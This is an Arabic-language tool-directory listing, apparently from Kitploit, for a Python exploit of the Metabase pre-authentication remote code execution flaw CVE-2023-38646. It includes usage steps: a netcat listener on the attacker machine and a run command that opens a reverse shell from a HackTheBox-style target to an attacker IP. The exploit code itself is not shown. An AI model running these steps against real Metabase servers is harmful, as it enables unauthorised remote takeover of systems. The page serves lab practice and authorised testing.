Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-38646 — # استغلال Python لثغرة Metabase RCE قبل المصادقة (CVE-2023-38646) ينشئ قشرة عكسية لاختبارات الأمان المصرح بها. | Kitploit
أدوات/GitHubGitHub/asepsaepdin/cve-2023-38646
الاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubasepsaepdin/cve-2023-38646

CVE-2023-38646

# استغلال Python لثغرة Metabase RCE قبل المصادقة (CVE-2023-38646) ينشئ قشرة عكسية لاختبارات الأمان المصرح بها.

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-38646 - Metabase Pre-Auth RCE


⚠️ لأغراض تعليمية وأبحاث أمنية مصرح بها فقط

مؤلف الاستغلال الأصلي

ممتن جدًا لمؤلف الإثبات الأولي securezeron

خطوات التطبيق

  1. قم بإعداد المستمع على جهاز المهاجم:

    root@kitploit:~
    nc -nlvp 4444
    
  2. ثم، قم بتشغيل هذا الأمر:

    root@kitploit:~
    python3 CVE-2023-38646-Reverse-Shell.py -h
    python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
    

    image

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2023-38646
  • https://medium.com/@starlox.riju123/hackthebox-analytics-metabase-rce-bd3421cba76d
  • https://www.youtube.com/watch?v=br7JZzcTDG0
تنزيل الأداة